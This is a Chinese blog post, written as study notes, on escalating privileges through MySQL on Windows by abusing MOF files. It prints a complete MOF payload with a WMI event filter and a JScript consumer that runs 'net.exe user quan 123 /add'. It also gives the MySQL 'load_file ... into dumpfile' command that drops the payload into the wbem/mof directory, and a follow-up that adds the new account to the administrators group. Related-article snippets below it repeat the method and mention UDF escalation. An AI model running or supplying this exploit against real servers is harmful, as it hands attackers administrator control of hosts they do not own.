mysql mof提权原理_Day3——提权学习之MySQL数据库(MOF提权)

最新推荐文章于 2024-03-17 16:44:01 发布
最新推荐文章于 2024-03-17 16:44:01 发布
阅读量103 收藏
点赞数
文章标签: mysql mof提权原理
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29302047/article/details/113592920
版权

0x00 原理

利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。

0x01 利用条件

具备Mysql的root权限

0x02 提权关键

导入nullevt.mof

0x03 提权步骤

1、生成 nullevt.mof文件,上传文件到可写目录

#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter

{

EventNamespace = “Root\\Cimv2”;

Name = “filtP2”;

Query = “Select * From __InstanceModificationEvent “

“Where TargetInstance Isa \”Win32_LocalTime\” “

“And TargetInstance.Second = 5”;

QueryLanguage = “WQL”;

};

instance of ActiveScriptEventConsumer as $Consumer

{

Name = “consPCSV2”;

ScriptingEngine = “JScript”;

ScriptText =

“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user quan 123 /add\”)“;

};

instance of __FilterToConsumerBinding

{

Consumer = $Consumer;

Filter = $EventFilter;

};

2、执行导入命令 把我们的提权命令将 nullevt.mof 导入到c:/windows/system32/wbem/mof/目录

select load_file(“G:/test/nullevt.mof”) into dumpfile “c:/windows/system32/wbem/mof/nullevt.mof”

导入后,系统会自动运行该文件。 3、将提权脚本中添加用户命令修改为提升至administrators组:net.exe localgroup administrators quan /add,再次上传并导入

为了更高的成功率,我们必须分开两次导入该脚本。 第一次为添加用户,第二次对添加的用户进行提权。

添加用户

net.exe user quan 123 /add

对添加的用户进行提权

net.exe localgroup administrators quan /add

4、net user查看用户

0x04 参考

V12119w
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
提权学习MySQL数据库提权mof 漏洞提权
bylfsj的博客
10-12 606
1.原理 关于 mof 提权原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。 2.执行 1.将一下代码保存为nullevt.mof文件 #pragma namespace("\\.\root\subscription") instance ...
数据库提权
weixin_30786657的博客
07-04 323
MOF提权 UDF提权 select load_file('/var/www/html/udf/udf.so') into dumpfile "/var/lib/mysql/udf.dll" create function sys_eval returns string soname 'udf.so' select sys_eval('ip...
MySQL提权原理及过程
kuiguowei的博客
01-12 1909
mof提权原理 mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管
渗透过程中的数据库提权思路
carbbage的博客
12-19 347
在渗透测试中,我们可能误打误撞得到了几个粗心管理员的数据库密码,当我们一脸欣喜的连接上后,却发现库子里一清二白,或者找不到跟web项目的对应关系,那就只能从数据库层面入手,一步步夺取目标主机权限。 下面总结了一下几种常见数据库提权思路。 mysql 作为目前使用人数最多也是最受欢迎的数据库,在大型的渗透测试中,很有可能就被扫出一两个弱密码,但时代早就变了,mysql早已已经不是那个写个webshell就直接root的傻白甜了,secure-file-priv直接将无数hacker阻于门外,虽然现在网上还
mysql的几种提权方式
qq_39388922的博客
10-30 1443
mysql的几种提权方式 记录防丢失 Windows UDF提权 在windows下存在一个叫做动态链接库的东西,俗称DLL。该文件会把程序代码中使用的函数编译成机器码,保存在DLL文件中;在编译时,编译器不会把函数的机器码复制到可执行文件EXE中,而是在EXE执行文件中说明索要调用的函数在哪个DLL文件中,程序在执行时会自动从DLL文件中调用指定的函数 在不同的操作系统上,UDF提权的整体思路是...
mof提权文件nullevt.mof
03-12
其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户的命令。 mof文件通过Mofcomp....
Mysql UDF、MOF、反链端口提权.zip
12-14
Mysql UDF、MOF、反链端口提权
第60天:权限提升-MY&MS&ORA等SQL数据库提权1
08-03
在网络安全和渗透测试中,权限提升是一个关键环节,尤其是在无法利用系统级溢出漏洞时,数据库提权成为了攻击者常用的技术。本篇文章将详细讲解如何针对MY&MS&ORA等SQL数据库进行提权,以及涉及的相关知识点。 首先...
MOF_V2.5.1
07-13
MOF_V2.5.1
DS_project_MOF_H2_ML
04-19
该项目“DS_project_MOF_H2_ML”是加州大学伯克利分校DS 100课程的一个实践项目,主要涉及数据科学与机器学习的应用。在这个项目中,学生可能需要运用数据处理、建模和预测技术来解决实际问题,特别是在材料科学领域...
微波法合成缺陷MOF-5用于多相催化
12-27
微波法合成缺陷MOF-5用于多相催化,陈兰君,霍甲,本文采用微波辅助的方法,合成配体缺陷化金属有机框架,系统研究反应时间等因素对缺陷的影响,并将其应用于催化反应。通过扫描电
提权方式及原理简介(面试)
jklbnm12的博客
02-21 2335
一、提权 想了解原理首先要明白什么叫提权,为什么要提权,通常获取到Shell之后,假如我们拿到的是普通权限比如mysql、tomcat等普通应用权限,那我们如果想在内网畅通无阻,那肯定第一步需要获取到管理员最起码要是administrator甚至是system。 这种获取最高权限的方式就叫提权。 二、提权方式 1、系统本地漏洞提权 2、数据库提权 3、第三方软件提权 4、获取高权限用户比如msf的getsystem提权等 三、分类 Windows提权 Windows提权一般为系统漏洞提权, wmic qf
mysql提权总结(自学)
最新发布
m0_64481831的博客
03-17 1287
检测数据库的存在(探测端口)获取到数据库的权限密码查看数据库的类型分类读取网站的配置文件读取数据库备份文件下的库中的表的信息,例如MySQL数据库mysql_user表中存储账户密码,使用cmd5-mysql5解码暴力破解账户密码,需要支持外联(mysql默认不支持)。可以使用密码脚本在本地爆破,也可以使用工具如msf的scanner mysql_login模块MySQL数据库提权方式主要有三种使用sqlmap的--os-shell。
后渗透—— 数据库MOF提权
爱国小白帽
03-12 1358
提权原理mof是windows系统的一个文件(在c:/windows/system32/wbem/mof/nullevt.mof)叫做"托管对象格式"其作用是每隔五秒就会去监控进程创建和死亡。其就是用又了mysql的root权限了以后,然后使用root权限去执行我们上传的mof。隔了一定时间以后这个mof就会被执行,这个mof当中有一段是vbs脚本,这个vbs大多数的是cmd的添加管理员用户...
MySQL提权mof提权
2301_77300311的博客
04-11 534
关于 mof 提权原理其实很简单,就是利用了 c:/windows/system32/wbem/mof/ 目录下的 nullevt.mof 文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。MOF文件每五秒就会执行,而且是系统权限,我们通过mysql使用load_file 将文件写入/wbme/mof,然后系统每隔五秒就会执行一次我们上传的MOF。我们提权成功后,就算被删号,mof也会在五秒内将原账号重建,那么这给我们退出测试造成了很大的困扰,所以谨慎使用。
利用数据库提权参考方法
bobo_milk的博客
11-26 1391
数据库提权方法
About Mysql 的那个提权漏洞
代码析构师的专栏
06-05 565
致看了一下,原来是在导出文件的时候出的问题,具体怎么出的问题,表示看mysql的源码不是我能看的来的。。 大家都知道,要对方开启mysql的外联,并且有root密码,这种情况只能用来扫肉鸡了,还蛋疼的不行。所以我感觉用在webshell下辅助提权不错,毕竟如果导udf什么相对麻烦了一些。所以就有下面的利用: 1.找个可写目录,我这里是C:\recycler\,把如下代码写到nullev
linux mysql mof提权,mysql提权mof提权
weixin_39629631的博客
05-10 253
拿下webshell之后当前权限仅限于对网站文件的操作,想要获取对主机的操作还需进一步提权首先介绍mof提权,直接案例演示找一个可写目录上传mof文件,我这里上传到了 C:/wmpub/nullevt.mof 代码如下#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter{Eve...
mysql mof提权原理_mof提权原理及实现
weixin_36462845的博客
02-01 342
关于 mof 提权原理其实很简单,就是利用了c:/windows/system32/wbem/mof/目录下的nullevt.mof文件,每分钟都会在一个特定的时间去执行一次的特性,来写入我们的cmd命令使其被带入执行。下面简单演示下 mof 提权的过程!首先将我们的 mof 提权脚本上传到可读写目录下,这里就不做演示了。接着我们选择 MySQL 提权项,输入我们已经获取的MySQL 账户信息...
mysql mof提权原理_mof提权原理及其过程
05-16
Mof提权原理是通过创建一个恶意的Mof文件,并将其注册到WMI中,然后利用WMI的执行权限来执行Mof文件中的命令,从而实现提权。具体过程如下: 1. 创建一个恶意的Mof文件,并将其中的类名定义为“__EventFilter”,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值